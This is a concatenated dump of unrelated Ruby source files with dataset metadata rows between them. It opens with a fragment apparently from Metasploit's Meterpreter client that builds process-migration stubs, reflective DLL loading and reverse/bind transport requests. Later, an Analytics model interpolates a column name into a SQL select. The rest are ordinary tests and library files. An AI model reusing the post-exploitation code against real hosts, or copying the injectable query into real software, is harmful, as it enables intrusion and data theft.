end
private
#
# Get a reference to the currently active transport.
#
def get_current_transport
x = transport_list
x[:transports][0]
end
#
# Generate a migrate stub that is specific to the current transport type and the
# target process.
#
def generate_migrate_stub(target_process)
stub = nil
if client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
t = get_current_transport
c = Class.new(::Msf::Payload)
if target_process['arch'] == ARCH_X86
c.include(::Msf::Payload::Windows::BlockApi)
case t[:url]
when /^tcp/i
c.include(::Msf::Payload::Windows::MigrateTcp)
when /^pipe/i
c.include(::Msf::Payload::Windows::MigrateNamedPipe)
when /^http/i
# Covers HTTP and HTTPS
c.include(::Msf::Payload::Windows::MigrateHttp)
end
else
c.include(::Msf::Payload::Windows::BlockApi_x64)
case t[:url]
when /^tcp/i
c.include(::Msf::Payload::Windows::MigrateTcp_x64)
when /^pipe/i
c.include(::Msf::Payload::Windows::MigrateNamedPipe_x64)
when /^http/i
# Covers HTTP and HTTPS
c.include(::Msf::Payload::Windows::MigrateHttp_x64)
end
end
stub = c.new().generate
else
raise RuntimeError, "Unsupported session #{client.session_type}"
end
stub
end
#
# Helper function to prepare a transport request that will be sent to the
# attached session.
#
def transport_prepare_request(method, opts={})
unless valid_transport?(opts[:transport]) && opts[:lport]
return nil
end
if opts[:transport].starts_with?('reverse')
return false unless opts[:lhost]
else
# Bind shouldn't have lhost set
opts[:lhost] = nil
end
transport = opts[:transport].downcase
request = Packet.create_request(method)
scheme = transport.split('_')[1]
url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
if opts[:luri] && opts[:luri].length > 0
if opts[:luri][0] != '/'
url << '/'
end
url << opts[:luri]
if url[-1] == '/'
url = url[0...-1]
end
end
if opts[:comm_timeout]
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
end
if opts[:session_exp]
request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
end
if opts[:retry_total]
request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
end
if opts[:retry_wait]
request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
end
# do more magic work for http(s) payloads
unless transport.ends_with?('tcp')
if opts[:uri]
url << '/' unless opts[:uri].start_with?('/')
url << opts[:uri]
url << '/' unless opts[:uri].end_with?('/')
else
sum = uri_checksum_lookup(:connect)
url << generate_uri_uuid(sum, opts[:uuid]) + '/'
end
# TODO: randomise if not specified?
opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
if transport == 'reverse_https' && opts[:cert] # currently only https transport offers ssl
hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert])
request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
end
if opts[:proxy_host] && opts[:proxy_port]
prefix = 'http://'
prefix = 'socks=' if opts[:proxy_type].to_s.downcase == 'socks'
proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
request.add_tlv(TLV_TYPE_TRANS_PROXY_HOST, proxy)
if opts[:proxy_user]
request.add_tlv(TLV_TYPE_TRANS_PROXY_USER, opts[:proxy_user])
end
if opts[:proxy_pass]
request.add_tlv(TLV_TYPE_TRANS_PROXY_PASS, opts[:proxy_pass])
end
end
end
request.add_tlv(TLV_TYPE_TRANS_TYPE, VALID_TRANSPORTS[transport])
request.add_tlv(TLV_TYPE_TRANS_URL, url)
request
end
#
# Create a full Windows-specific migration payload specific to the target process.
#
def generate_migrate_windows_payload(target_process)
c = Class.new( ::Msf::Payload )
c.include( ::Msf::Payload::Stager )
# Include the appropriate reflective dll injection module for the target process architecture...
# Used to generate a reflective DLL when migrating. This is yet another
# argument for moving the meterpreter client into the Msf namespace.
if target_process['arch'] == ARCH_X86
c.include( ::Msf::Payload::Windows::MeterpreterLoader )
elsif target_process['arch'] == ARCH_X64
c.include( ::Msf::Payload::Windows::MeterpreterLoader_x64 )
else
raise RuntimeError, "Unsupported target architecture '#{target_process['arch']}' for process '#{target_process['name']}'.", caller
end
# Create the migrate stager
migrate_stager = c.new()
migrate_stager.stage_meterpreter
end
#
# Create a full migration payload specific to the target process.
#
def generate_migrate_payload(target_process)
case client.platform
when 'windows'
blob = generate_migrate_windows_payload(target_process)
else
raise RuntimeError, "Unsupported platform '#{client.platform}'"
end
blob
end
end
end; end; end
| 29.848075 | 140 | 0.68404 |
e27e4fa758e5eade7f7cf4b6a0019b2ff75925ef | 973 | require "rails_helper"
RSpec.describe Admin::TeamsController, type: :controller do
let(:admin) { create(:admin) }
let(:user) { create(:user) }
context "as admin user" do
before :each do
create(:registry)
sign_in admin
end
describe "GET #index" do
it "paginates teams" do
get :index
expect(assigns(:teams)).to respond_to(:total_pages)
end
it "returns http success" do
get :index
expect(response).to have_http_status(:success)
end
end
end
context "not logged into portus" do
describe "GET #index" do
it "redirects to login page" do
get :index
expect(response).to redirect_to(new_user_session_path)
end
end
end
context "as normal user" do
before :each do
sign_in user
end
describe "GET #index" do
it "blocks access" do
get :index
expect(response.status).to eq(401)
end
end
end
end
| 19.46 | 62 | 0.610483 |
1ab8af48bd99f251aaaf0625b86f5d8c94ab94a3 | 440 | require_relative 'meta'
require_relative 'range'
require_relative 'hour_range'
class RentalPlan
attr_reader :ranges
def self.make name
make_meta name
make_ranges
new @meta, @ranges
end
def self.make_meta name
@meta = Meta.new name
end
def self.make_ranges
@ranges = [ PlanRange.make ]
end
def initialize meta, ranges
@meta = meta
@ranges = ranges
end
def name
@meta.name
end
end
| 13.75 | 32 | 0.679545 |
ab8fd73ffc245b1b6a727eb1a7645da141a1074d | 404 | # frozen_string_literal: true
class Analytics < ApplicationRecord
scope :hits_by_ip, ->(ip, col = "*") { select("#{col}").where(ip_address: ip).order("id DESC")}
def self.count_by_col(col)
calculate(:count, col)
end
def self.parse_field(field)
valid_fields = ["ip_address", "referrer", "user_agent"]
if valid_fields.include?(field)
field
else
"1"
end
end
end
| 21.263158 | 97 | 0.65099 |
625cf1fb985cff03036d634d08cfa56e352b8633 | 216 | module Payjp
class Customer < APIResource
include Payjp::APIOperations::Create
include Payjp::APIOperations::Delete
include Payjp::APIOperations::Update
include Payjp::APIOperations::List
end
end
| 24 | 40 | 0.75463 |
871cf1f0b92d543abaa5c16f8761f58c106337bf | 160 | require 'bundler'
Bundler.require :default, ENV['RACK_ENV'] || ENV['RAILS_ENV'] || :development
require './lib/banner_syncinator'
BannerSyncinator.initialize!
| 26.666667 | 77 | 0.7625 |
219fd92bd73292fa662d8652a70b23908c5a0504 | 7,053 | #! /usr/bin/ruby
# coding: utf-8
$: << File.dirname(__FILE__) + '/../lib'
#require 'rubygems'
require 'test/unit'
require 'ole/storage'
require 'digest/sha1'
require 'stringio'
require 'tempfile'
#
# = TODO
#
# These tests could be a lot more complete.
#
# should test resizeable and migrateable IO.
class TestStorageRead < Test::Unit::TestCase
TEST_DIR = File.dirname __FILE__
def setup
@ole = Ole::Storage.open "#{TEST_DIR}/test_word_6.doc", 'rb'
end
def teardown
@ole.close
end
def test_header
# should have further header tests, testing the validation etc.
assert_equal 17, @ole.header.to_a.length
assert_equal 117, @ole.header.dirent_start
assert_equal 1, @ole.header.num_bat
assert_equal 1, @ole.header.num_sbat
assert_equal 0, @ole.header.num_mbat
end
def test_new_without_explicit_mode
open "#{TEST_DIR}/test_word_6.doc", 'rb' do |f|
assert_equal false, Ole::Storage.new(f).writeable
end
end
def capture_warnings
@warn = []
outer_warn = @warn
old_log = Ole::Log
old_verbose = $VERBOSE
begin
$VERBOSE = nil
Ole.const_set :Log, Object.new
# restore for the yield
$VERBOSE = old_verbose
(class << Ole::Log; self; end).send :define_method, :warn do |message|
outer_warn << message
end
yield
ensure
$VERBOSE = nil
Ole.const_set :Log, old_log
$VERBOSE = old_verbose
end
end
def test_invalid
assert_raises Ole::Storage::FormatError do
Ole::Storage.open StringIO.new(0.chr * 1024)
end
assert_raises Ole::Storage::FormatError do
Ole::Storage.open StringIO.new(Ole::Storage::Header::MAGIC + 0.chr * 1024)
end
capture_warnings do
head = Ole::Storage::Header.new
head.threshold = 1024
assert_raises NoMethodError do
Ole::Storage.open StringIO.new(head.to_s + 0.chr * 1024)
end
end
assert_equal ['may not be a valid OLE2 structured storage file'], @warn
end
def test_inspect
assert_match(/#<Ole::Storage io=#<File:.*?test_word_6.doc> root=#<Dirent:"Root Entry">>/, @ole.inspect)
end
def test_fat
# the fat block has all the numbers from 5..118 bar 117
bbat_table = [112] + ((5..118).to_a - [112, 117])
assert_equal bbat_table, @ole.bbat.reject { |i| i >= (1 << 32) - 3 }, 'bbat'
sbat_table = (1..43).to_a - [2, 3]
assert_equal sbat_table, @ole.sbat.reject { |i| i >= (1 << 32) - 3 }, 'sbat'
end
def test_directories
assert_equal 5, @ole.dirents.length, 'have all directories'
# a more complicated one would be good for this
assert_equal 4, @ole.root.children.length, 'properly nested directories'
end
def test_utf16_conversion
assert_equal 'Root Entry', @ole.root.name
assert_equal 'WordDocument', @ole.root.children[2].name
end
def test_read
# the regular String#hash was different on the mac, so asserting
# against full strings. switch this to sha1 instead of this fugly blob
sha1sums = %w[
d3d1cde9eb43ed4b77d197af879f5ca8b8837577
65b75cbdd1f94ade632baeeb0848dec2a342c844
cfc230ec7515892cfdb85e4a173e0ce364094970
ffd859d94647a11b693f06f092d1a2bccc59d50d
]
# test the ole storage type
type = 'Microsoft Word 6.0-Dokument'
assert_equal type, (@ole.root/"\001CompObj").read[32..-1][/([^\x00]+)/m, 1]
# i was actually not loading data correctly before, so carefully check everything here
assert_equal sha1sums, @ole.root.children.map { |child| Digest::SHA1.hexdigest child.read }
end
def test_dirent
dirent = @ole.root.children.first
assert_equal "\001Ole", dirent.name
assert_equal 20, dirent.size
assert_equal '#<Dirent:"Root Entry">', @ole.root.inspect
# exercise Dirent#[]. note that if you use a number, you get the Struct
# fields.
assert_equal dirent, @ole.root["\001Ole"]
assert_equal dirent.name_utf16, dirent[0]
assert_equal nil, @ole.root.time
assert_equal @ole.root.children, @ole.root.to_enum(:each_child).to_a
dirent.open('r') { |f| assert_equal 2, f.first_block }
dirent.open('w') { |f| }
dirent.open('a') { |f| }
end
def test_delete
dirent = @ole.root.children.first
assert_raises(ArgumentError) { @ole.root.delete nil }
assert_equal [dirent], @ole.root.children & [dirent]
assert_equal 20, dirent.size
@ole.root.delete dirent
assert_equal [], @ole.root.children & [dirent]
assert_equal 0, dirent.size
end
end
class TestStorageWrite < Test::Unit::TestCase
TEST_DIR = File.dirname __FILE__
def sha1 str
Digest::SHA1.hexdigest str
end
# try and test all the various things the #flush function does
def test_flush
end
# FIXME
# don't really want to lock down the actual internal api's yet. this will just
# ensure for the time being that #flush continues to work properly. need a host
# of checks involving writes that resize their file bigger/smaller, that resize
# the bats to more blocks, that resizes the sb_blocks, that has migration etc.
def test_write_hash
io = StringIO.open open("#{TEST_DIR}/test_word_6.doc", 'rb', &:read)
assert_equal '9974e354def8471225f548f82b8d81c701221af7', sha1(io.string)
Ole::Storage.open(io, :update_timestamps => false) { }
# hash changed. used to be efa8cfaf833b30b1d1d9381771ddaafdfc95305c
# thats because i now truncate the io, and am probably removing some trailing
# allocated available blocks.
assert_equal 'a39e3c4041b8a893c753d50793af8d21ca8f0a86', sha1(io.string)
# add a repack test here
Ole::Storage.open io, :update_timestamps => false, &:repack
assert_equal 'c8bb9ccacf0aaad33677e1b2a661ee6e66a48b5a', sha1(io.string)
end
def test_plain_repack
io = StringIO.open open("#{TEST_DIR}/test_word_6.doc", 'rb', &:read)
assert_equal '9974e354def8471225f548f82b8d81c701221af7', sha1(io.string)
Ole::Storage.open io, :update_timestamps => false, &:repack
# note equivalence to the above flush, repack, flush
assert_equal 'c8bb9ccacf0aaad33677e1b2a661ee6e66a48b5a', sha1(io.string)
# lets do it again using memory backing
Ole::Storage.open(io, :update_timestamps => false) { |ole| ole.repack :mem }
# note equivalence to the above flush, repack, flush
assert_equal 'c8bb9ccacf0aaad33677e1b2a661ee6e66a48b5a', sha1(io.string)
assert_raises ArgumentError do
Ole::Storage.open(io, :update_timestamps => false) { |ole| ole.repack :typo }
end
end
def test_create_from_scratch_hash
io = StringIO.new('')
Ole::Storage.open(io) { }
assert_equal '6bb9d6c1cdf1656375e30991948d70c5fff63d57', sha1(io.string)
# more repack test, note invariance
Ole::Storage.open io, :update_timestamps => false, &:repack
assert_equal '6bb9d6c1cdf1656375e30991948d70c5fff63d57', sha1(io.string)
end
def test_create_dirent
Ole::Storage.open StringIO.new do |ole|
dirent = Ole::Storage::Dirent.new ole, :name => 'test name', :type => :dir
assert_equal 'test name', dirent.name
assert_equal :dir, dirent.type
# for a dirent created from scratch, type_id is currently not set until serialization:
assert_equal 0, dirent.type_id
dirent.to_s
assert_equal 1, dirent.type_id
assert_raises(ArgumentError) { Ole::Storage::Dirent.new ole, :type => :bogus }
end
end
end
| 31.77027 | 105 | 0.726641 |
26dd81bde58a587f6531c0a91f8dfea7c93457f7 | 181 | if ENV['COVERAGE']
require 'simplecov'
SimpleCov.start
end
require File.expand_path('../lib/web_translate_it', __dir__)
require 'rspec'
class I18n
def self.reload!; end
end
| 15.083333 | 60 | 0.740331 |
ac09771781aada4917633737db8ab228e3392c31 | 1,423 | require 'rails_helper'
describe PivCacAuthenticationSetupPresenter do
let(:user) { create(:user) }
let(:presenter) { described_class.new(user, false, form) }
let(:form) do
OpenStruct.new
end
describe '#title' do
let(:expected_title) { t('titles.piv_cac_setup.new') }
it { expect(presenter.title).to eq expected_title }
end
describe '#heading' do
let(:expected_heading) { t('headings.piv_cac_setup.new') }
it { expect(presenter.heading).to eq expected_heading }
end
describe '#description' do
let(:expected_description) { t('forms.piv_cac_setup.piv_cac_intro_html') }
it { expect(presenter.description).to eq expected_description }
end
describe 'shows correct step indication' do
context 'with signed in user adding additional method' do
let(:user) { build(:user, :signed_up) }
let(:presenter) { described_class.new(user, true, form) }
it 'does not show step count' do
expect(presenter.steps_visible?).to eq false
end
end
context 'with user signing up who has not chosen first option' do
it 'shows user is on step 3 of 4' do
expect(presenter.step).to eq '3'
end
end
context 'with user signing up who has chosen first option' do
let(:user) { build(:user, :with_webauthn) }
it 'shows user is on step 4 of 4' do
expect(presenter.step).to eq '4'
end
end
end
end
| 26.849057 | 78 | 0.669712 |
080840b7350b95df79f2fb56974c4e1869b569fe | 508 | name 'kernel_module'
maintainer 'Chef Software, Inc.'
maintainer_email '[email protected]'
license 'MIT'
description 'Load kernel modules'
version '1.1.4'
%w(amazon centos debian fedora oracle redhat scientific suse opensuse opensuseleap ubuntu).each do |os|
supports os
end
source_url 'https://github.com/chef-cookbooks/kernel_module'
issues_url 'https://github.com/chef-cookbooks/kernel_module/issues'
chef_version '>= 12.7' if respond_to?(:chef_version)
| 33.866667 | 103 | 0.716535 |
ffefb912b1048b78e4649c8cfc7c24e66d58d978 | 21,077 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "helper"
require "gapic/grpc/service_stub"
require "google/cloud/dialogflow/v2/participant_pb"
require "google/cloud/dialogflow/v2/participant_services_pb"
require "google/cloud/dialogflow/v2/participants"
class ::Google::Cloud::Dialogflow::V2::Participants::ClientTest < Minitest::Test
class ClientStub
attr_accessor :call_rpc_count, :requests
def initialize response, operation, &block
@response = response
@operation = operation
@block = block
@call_rpc_count = 0
@requests = []
end
def call_rpc *args, **kwargs
@call_rpc_count += 1
@requests << @block&.call(*args, **kwargs)
yield @response, @operation if block_given?
@response
end
end
def test_create_participant
# Create GRPC objects.
grpc_response = ::Google::Cloud::Dialogflow::V2::Participant.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
participant = {}
create_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :create_participant, name
assert_kind_of ::Google::Cloud::Dialogflow::V2::CreateParticipantRequest, request
assert_equal "hello world", request["parent"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::Participant), request["participant"]
refute_nil options
end
Gapic::ServiceStub.stub :new, create_participant_client_stub do
# Create client
client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.create_participant({ parent: parent, participant: participant }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.create_participant parent: parent, participant: participant do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.create_participant ::Google::Cloud::Dialogflow::V2::CreateParticipantRequest.new(parent: parent, participant: participant) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.create_participant({ parent: parent, participant: participant }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.create_participant(::Google::Cloud::Dialogflow::V2::CreateParticipantRequest.new(parent: parent, participant: participant), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, create_participant_client_stub.call_rpc_count
end
end
def test_get_participant
# Create GRPC objects.
grpc_response = ::Google::Cloud::Dialogflow::V2::Participant.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
name = "hello world"
get_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_participant, name
assert_kind_of ::Google::Cloud::Dialogflow::V2::GetParticipantRequest, request
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_participant_client_stub do
# Create client
client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_participant({ name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_participant name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_participant ::Google::Cloud::Dialogflow::V2::GetParticipantRequest.new(name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_participant({ name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_participant(::Google::Cloud::Dialogflow::V2::GetParticipantRequest.new(name: name), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_participant_client_stub.call_rpc_count
end
end
def test_list_participants
# Create GRPC objects.
grpc_response = ::Google::Cloud::Dialogflow::V2::ListParticipantsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
page_size = 42
page_token = "hello world"
list_participants_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_participants, name
assert_kind_of ::Google::Cloud::Dialogflow::V2::ListParticipantsRequest, request
assert_equal "hello world", request["parent"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_participants_client_stub do
# Create client
client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_participants({ parent: parent, page_size: page_size, page_token: page_token }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_participants parent: parent, page_size: page_size, page_token: page_token do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_participants ::Google::Cloud::Dialogflow::V2::ListParticipantsRequest.new(parent: parent, page_size: page_size, page_token: page_token) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_participants({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_participants(::Google::Cloud::Dialogflow::V2::ListParticipantsRequest.new(parent: parent, page_size: page_size, page_token: page_token), grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_participants_client_stub.call_rpc_count
end
end
def test_update_participant
# Create GRPC objects.
grpc_response = ::Google::Cloud::Dialogflow::V2::Participant.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
participant = {}
update_mask = {}
update_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :update_participant, name
assert_kind_of ::Google::Cloud::Dialogflow::V2::UpdateParticipantRequest, request
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::Participant), request["participant"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Protobuf::FieldMask), request["update_mask"]
refute_nil options
end
Gapic::ServiceStub.stub :new, update_participant_client_stub do
# Create client
client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.update_participant({ participant: participant, update_mask: update_mask }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.update_participant participant: participant, update_mask: update_mask do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.update_participant ::Google::Cloud::Dialogflow::V2::UpdateParticipantRequest.new(participant: participant, update_mask: update_mask) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.update_participant({ participant: participant, update_mask: update_mask }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.update_participant(::Google::Cloud::Dialogflow::V2::UpdateParticipantRequest.new(participant: participant, update_mask: update_mask), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, update_participant_client_stub.call_rpc_count
end
end
def test_analyze_content
# Create GRPC objects.
grpc_response = ::Google::Cloud::Dialogflow::V2::AnalyzeContentResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
participant = "hello world"
text_input = {}
reply_audio_config = {}
query_params = {}
request_id = "hello world"
analyze_content_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :analyze_content, name
assert_kind_of ::Google::Cloud::Dialogflow::V2::AnalyzeContentRequest, request
assert_equal "hello world", request["participant"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::TextInput), request["text_input"]
assert_equal :text_input, request.input
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::OutputAudioConfig), request["reply_audio_config"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2::QueryParameters), request["query_params"]
assert_equal "hello world", request["request_id"]
refute_nil options
end
Gapic::ServiceStub.stub :new, analyze_content_client_stub do
# Create client
client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.analyze_content({ participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.analyze_content participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.analyze_content ::Google::Cloud::Dialogflow::V2::AnalyzeContentRequest.new(participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.analyze_content({ participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.analyze_content(::Google::Cloud::Dialogflow::V2::AnalyzeContentRequest.new(participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, request_id: request_id), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, analyze_content_client_stub.call_rpc_count
end
end
def test_suggest_articles
# Create GRPC objects.
grpc_response = ::Google::Cloud::Dialogflow::V2::SuggestArticlesResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
latest_message = "hello world"
context_size = 42
suggest_articles_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :suggest_articles, name
assert_kind_of ::Google::Cloud::Dialogflow::V2::SuggestArticlesRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["latest_message"]
assert_equal 42, request["context_size"]
refute_nil options
end
Gapic::ServiceStub.stub :new, suggest_articles_client_stub do
# Create client
client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.suggest_articles({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.suggest_articles parent: parent, latest_message: latest_message, context_size: context_size do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.suggest_articles ::Google::Cloud::Dialogflow::V2::SuggestArticlesRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.suggest_articles({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.suggest_articles(::Google::Cloud::Dialogflow::V2::SuggestArticlesRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, suggest_articles_client_stub.call_rpc_count
end
end
def test_suggest_faq_answers
# Create GRPC objects.
grpc_response = ::Google::Cloud::Dialogflow::V2::SuggestFaqAnswersResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
latest_message = "hello world"
context_size = 42
suggest_faq_answers_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :suggest_faq_answers, name
assert_kind_of ::Google::Cloud::Dialogflow::V2::SuggestFaqAnswersRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["latest_message"]
assert_equal 42, request["context_size"]
refute_nil options
end
Gapic::ServiceStub.stub :new, suggest_faq_answers_client_stub do
# Create client
client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.suggest_faq_answers({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.suggest_faq_answers parent: parent, latest_message: latest_message, context_size: context_size do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.suggest_faq_answers ::Google::Cloud::Dialogflow::V2::SuggestFaqAnswersRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.suggest_faq_answers({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.suggest_faq_answers(::Google::Cloud::Dialogflow::V2::SuggestFaqAnswersRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, suggest_faq_answers_client_stub.call_rpc_count
end
end
def test_configure
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
client = block_config = config = nil
Gapic::ServiceStub.stub :new, nil do
client = ::Google::Cloud::Dialogflow::V2::Participants::Client.new do |config|
config.credentials = grpc_channel
end
end
config = client.configure do |c|
block_config = c
end
assert_same block_config, config
assert_kind_of ::Google::Cloud::Dialogflow::V2::Participants::Client::Configuration, config
end
end
